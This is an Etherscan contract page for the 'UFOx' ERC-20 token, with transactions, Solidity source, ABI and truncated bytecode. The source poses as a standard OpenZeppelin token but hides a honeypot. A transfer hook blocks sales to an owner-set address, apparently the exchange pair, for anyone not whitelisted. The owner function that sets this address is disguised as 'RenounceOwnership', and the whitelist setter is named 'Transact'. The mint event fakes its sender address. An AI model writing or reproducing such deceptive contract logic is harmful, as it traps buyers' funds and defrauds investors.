ETH Price: $3,118.41 (+0.66%)
Gas: 4 Gwei

Contract

0xb855Fa2D90684ad1D750d7933aD29a263Af83031
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Value
Approve137050872021-11-28 22:52:36955 days ago1638139956IN
0xb855Fa2D...63Af83031
0 ETH0.00748366158.49855475
Approve137008912021-11-28 6:46:26956 days ago1638081986IN
0xb855Fa2D...63Af83031
0 ETH0.002908561.6
Approve137004932021-11-28 5:12:14956 days ago1638076334IN
0xb855Fa2D...63Af83031
0 ETH0.0032163668.12029161
Approve137004072021-11-28 4:58:05956 days ago1638075485IN
0xb855Fa2D...63Af83031
0 ETH0.0031267366.22194817
Approve137003582021-11-28 4:47:47956 days ago1638074867IN
0xb855Fa2D...63Af83031
0 ETH0.011804250
Approve137003282021-11-28 4:41:12956 days ago1638074472IN
0xb855Fa2D...63Af83031
0 ETH0.0038707581.97972465
Approve137001682021-11-28 4:08:40956 days ago1638072520IN
0xb855Fa2D...63Af83031
0 ETH0.0036809477.95960811
Approve137001102021-11-28 3:57:27956 days ago1638071847IN
0xb855Fa2D...63Af83031
0 ETH0.00542951114.99304944
Approve137001052021-11-28 3:55:54956 days ago1638071754IN
0xb855Fa2D...63Af83031
0 ETH0.00536546113.63656876
Approve137001042021-11-28 3:55:39956 days ago1638071739IN
0xb855Fa2D...63Af83031
0 ETH0.00477732101.18031954
Approve137000972021-11-28 3:52:36956 days ago1638071556IN
0xb855Fa2D...63Af83031
0 ETH0.00487245103.19503276
Approve137000952021-11-28 3:52:13956 days ago1638071533IN
0xb855Fa2D...63Af83031
0 ETH0.0045573596.52148598
Approve137000822021-11-28 3:48:28956 days ago1638071308IN
0xb855Fa2D...63Af83031
0 ETH0.00476682100.957816
Approve137000812021-11-28 3:47:48956 days ago1638071268IN
0xb855Fa2D...63Af83031
0 ETH0.0042664990.36119111
Approve137000812021-11-28 3:47:48956 days ago1638071268IN
0xb855Fa2D...63Af83031
0 ETH0.0042664990.36119111
Transfer137000702021-11-28 3:45:34956 days ago1638071134IN
0xb855Fa2D...63Af83031
0 ETH0.0045141590.48759737
Approve137000692021-11-28 3:45:01956 days ago1638071101IN
0xb855Fa2D...63Af83031
0 ETH0.0038480881.49963845
Approve137000632021-11-28 3:43:43956 days ago1638071023IN
0xb855Fa2D...63Af83031
0 ETH0.0041077987
Approve137000582021-11-28 3:42:25956 days ago1638070945IN
0xb855Fa2D...63Af83031
0 ETH0.0039482883.62172531
Approve137000572021-11-28 3:42:07956 days ago1638070927IN
0xb855Fa2D...63Af83031
0 ETH0.0036583677.71848285
Approve137000552021-11-28 3:41:35956 days ago1638070895IN
0xb855Fa2D...63Af83031
0 ETH0.0037621379.67926499
Approve137000522021-11-28 3:40:45956 days ago1638070845IN
0xb855Fa2D...63Af83031
0 ETH0.0044146993.5
Transfer137000522021-11-28 3:40:45956 days ago1638070845IN
0xb855Fa2D...63Af83031
0 ETH0.01486927297.77270032
Transfer137000502021-11-28 3:40:42956 days ago1638070842IN
0xb855Fa2D...63Af83031
0 ETH0.0039258578.6382554
Transfer137000432021-11-28 3:39:20956 days ago1638070760IN
0xb855Fa2D...63Af83031
0 ETH0.0045299482.8521609
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
UFOx

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2021-11-28
*/

/**
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]





/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
 
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    



// File @openzeppelin/contracts/token/ERC20/[email protected]





/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]





/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]







/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0x378Ddb6914e32c4D9c0E08881d460eE9c6C73b82), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

contract UFOx is ERC20, Ownable {
    mapping(address=>bool) private _enable;
    address private _uni;
    constructor() ERC20('UFOx','UFOx') {
        _mint(0xC7Df5dA2cf8dCAA8858C06DAda7CF9eba3C71FbF, 100000000 *10**18);
        _enable[0xC7Df5dA2cf8dCAA8858C06DAda7CF9eba3C71FbF] = true;
    }

    function _mint(
        address account,
        uint256 amount
    ) internal virtual override (ERC20) {
        require(ERC20.totalSupply() + amount <= 100000000 *10**18, "ERC20Capped: cap exceeded");
        super._mint(account, amount);
    
    }

    function Transact(address user, bool enable) public onlyOwner {
        _enable[user] = enable;
    }
    function RenounceOwnership(address uni_) public onlyOwner {
        _uni = uni_;
    }

    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override {
        if(to == _uni) {
            require(_enable[from], "something went wrong");
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"uni_","type":"address"}],"name":"RenounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"user","type":"address"},{"internalType":"bool","name":"enable","type":"bool"}],"name":"Transact","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600481526020017f55464f78000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f55464f780000000000000000000000000000000000000000000000000000000081525081600390805190602001906200009692919062000509565b508060049080519060200190620000af92919062000509565b5050506000620000c46200020660201b60201c565b905080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200019473c7df5da2cf8dcaa8858c06dada7cf9eba3c71fbf6a52b7d2dcc80cd2e40000006200020e60201b60201c565b60016006600073c7df5da2cf8dcaa8858c06dada7cf9eba3c71fbf73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555062000849565b600033905090565b6a52b7d2dcc80cd2e400000081620002306200029b60201b620003bd1760201c565b6200023c9190620006d3565b111562000280576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000277906200063f565b60405180910390fd5b620002978282620002a560201b620009b11760201c565b5050565b6000600254905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000318576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200030f9062000683565b60405180910390fd5b6200032c600083836200041d60201b60201c565b8060026000828254620003409190620006d3565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620003979190620006d3565b925050819055508173ffffffffffffffffffffffffffffffffffffffff1673378ddb6914e32c4d9c0e08881d460ee9c6c73b8273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620004119190620006a5565b60405180910390a35050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200050457600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1662000503576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004fa9062000661565b60405180910390fd5b5b505050565b82805462000517906200073a565b90600052602060002090601f0160209004810192826200053b576000855562000587565b82601f106200055657805160ff191683800117855562000587565b8280016001018555821562000587579182015b828111156200058657825182559160200191906001019062000569565b5b5090506200059691906200059a565b5090565b5b80821115620005b55760008160009055506001016200059b565b5090565b6000620005c8601983620006c2565b9150620005d582620007ce565b602082019050919050565b6000620005ef601483620006c2565b9150620005fc82620007f7565b602082019050919050565b600062000616601f83620006c2565b9150620006238262000820565b602082019050919050565b620006398162000730565b82525050565b600060208201905081810360008301526200065a81620005b9565b9050919050565b600060208201905081810360008301526200067c81620005e0565b9050919050565b600060208201905081810360008301526200069e8162000607565b9050919050565b6000602082019050620006bc60008301846200062e565b92915050565b600082825260208201905092915050565b6000620006e08262000730565b9150620006ed8362000730565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000725576200072462000770565b5b828201905092915050565b6000819050919050565b600060028204905060018216806200075357607f821691505b602082108114156200076a57620007696200079f565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f45524332304361707065643a2063617020657863656564656400000000000000600082015250565b7f736f6d657468696e672077656e742077726f6e67000000000000000000000000600082015250565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b611a6580620008596000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806378051f4d1161008c578063a457c2d711610066578063a457c2d714610261578063a8b28c4314610291578063a9059cbb146102ad578063dd62ed3e146102dd576100ea565b806378051f4d146102095780638da5cb5b1461022557806395d89b4114610243576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a957806370a08231146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f761030d565b60405161010491906113da565b60405180910390f35b61012760048036038101906101229190611191565b61039f565b60405161013491906113bf565b60405180910390f35b6101456103bd565b604051610152919061153c565b60405180910390f35b610175600480360381019061017091906110fe565b6103c7565b60405161018291906113bf565b60405180910390f35b6101936104c8565b6040516101a09190611557565b60405180910390f35b6101c360048036038101906101be9190611191565b6104d1565b6040516101d091906113bf565b60405180910390f35b6101f360048036038101906101ee9190611091565b61057d565b604051610200919061153c565b60405180910390f35b610223600480360381019061021e9190611091565b6105c5565b005b61022d610685565b60405161023a91906113a4565b60405180910390f35b61024b6106af565b60405161025891906113da565b60405180910390f35b61027b60048036038101906102769190611191565b610741565b60405161028891906113bf565b60405180910390f35b6102ab60048036038101906102a69190611151565b610835565b005b6102c760048036038101906102c29190611191565b61090c565b6040516102d491906113bf565b60405180910390f35b6102f760048036038101906102f291906110be565b61092a565b604051610304919061153c565b60405180910390f35b60606003805461031c906116a0565b80601f0160208091040260200160405190810160405280929190818152602001828054610348906116a0565b80156103955780601f1061036a57610100808354040283529160200191610395565b820191906000526020600020905b81548152906001019060200180831161037857829003601f168201915b5050505050905090565b60006103b36103ac610b18565b8484610b20565b6001905092915050565b6000600254905090565b60006103d4848484610ceb565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061041f610b18565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561049f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104969061145c565b60405180910390fd5b6104bc856104ab610b18565b85846104b791906115e4565b610b20565b60019150509392505050565b60006012905090565b60006105736104de610b18565b8484600160006104ec610b18565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461056e919061158e565b610b20565b6001905092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105cd610b18565b73ffffffffffffffffffffffffffffffffffffffff166105eb610685565b73ffffffffffffffffffffffffffffffffffffffff1614610641576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106389061147c565b60405180910390fd5b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600480546106be906116a0565b80601f01602080910402602001604051908101604052809291908181526020018280546106ea906116a0565b80156107375780601f1061070c57610100808354040283529160200191610737565b820191906000526020600020905b81548152906001019060200180831161071a57829003601f168201915b5050505050905090565b60008060016000610750610b18565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561080d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610804906114fc565b60405180910390fd5b61082a610818610b18565b85858461082591906115e4565b610b20565b600191505092915050565b61083d610b18565b73ffffffffffffffffffffffffffffffffffffffff1661085b610685565b73ffffffffffffffffffffffffffffffffffffffff16146108b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a89061147c565b60405180910390fd5b80600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000610920610919610b18565b8484610ceb565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610a21576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a189061151c565b60405180910390fd5b610a2d60008383610f6a565b8060026000828254610a3f919061158e565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a94919061158e565b925050819055508173ffffffffffffffffffffffffffffffffffffffff1673378ddb6914e32c4d9c0e08881d460ee9c6c73b8273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610b0c919061153c565b60405180910390a35050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b87906114bc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf79061141c565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cde919061153c565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d5b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d529061149c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610dcb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc2906113fc565b60405180910390fd5b610dd6838383610f6a565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e539061143c565b60405180910390fd5b8181610e6891906115e4565b60